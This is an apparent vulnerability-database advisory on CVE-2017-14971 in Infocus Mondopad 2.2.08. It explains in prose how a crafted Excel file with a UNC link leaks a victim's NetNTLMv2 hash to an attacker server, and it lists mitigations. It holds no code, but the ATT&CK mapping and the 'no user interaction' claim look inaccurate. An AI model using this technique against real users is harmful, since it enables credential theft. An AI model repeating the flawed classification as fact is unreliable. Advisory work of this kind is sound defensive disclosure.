CVE-2017-14971 in Mondopad
Summary
by MITRE
Infocus Mondopad 2.2.08 is vulnerable to a Hashed Credential Disclosure vulnerability. The attacker provides a crafted Microsoft Office document containing a link that has a UNC pathname associated with an attacker-controller server. In one specific scenario, the attacker provides an Excel spreadsheet, and the attacker-controller server receives the victim's NetNTLMv2 hash.
VulDB is the best source for vulnerability data and more expert information about this specific topic.
Analysis
by VulDB Data Team • 11/23/2019
This vulnerability exists in the Infocus Mondopad version 2.2.08 software where a Hashed Credential Disclosure flaw allows attackers to obtain sensitive authentication information through malicious Microsoft Office documents. The vulnerability stems from improper handling of Universal Naming Convention pathnames within Office documents, specifically when these paths reference attacker-controlled servers. The attack vector involves crafting a malicious Excel spreadsheet that contains a UNC path link pointing to an attacker-controlled server, which when accessed by a victim system triggers credential disclosure.
The technical implementation of this vulnerability leverages the Windows authentication mechanism where systems automatically attempt to authenticate when accessing network resources via UNC paths. When a user opens the malicious Excel document and the system attempts to resolve the UNC path, it automatically sends the victim's NetNTLMv2 hash to the attacker's server without requiring explicit authentication. This represents a classic credential harvesting attack that exploits the automatic authentication behavior of Windows systems. The vulnerability is classified under CWE-310 as Cryptographic Issues, specifically related to improper handling of authentication credentials.
The operational impact of this vulnerability is significant as it allows attackers to obtain valid authentication hashes that can be used for lateral movement within networks or for offline password cracking attacks. The attacker can capture these NetNTLMv2 hashes and potentially use them to authenticate as the victim user on other systems within the network. This creates a pathway for privilege escalation and persistent access to compromised environments. The vulnerability affects the authentication security model by bypassing the need for user interaction or explicit credential entry, making it particularly dangerous in enterprise environments where users frequently open Office documents.
Mitigation strategies should focus on implementing network-level controls to prevent access to attacker-controlled UNC paths, such as blocking access to specific IP ranges or implementing network segmentation. Organizations should also disable automatic authentication for UNC paths through Group Policy settings and configure Windows to not automatically send credentials to UNC paths. Additionally, security awareness training should emphasize the dangers of opening untrusted Office documents, while network monitoring should be enhanced to detect unusual access patterns to UNC paths. The ATT&CK framework categorizes this as Credential Access - Credential Dumping, specifically leveraging the T1003.001 sub-technique for OS Credential Dumping. Implementing strict network access controls and disabling automatic authentication features in Windows systems provides the most effective defense against this specific attack vector.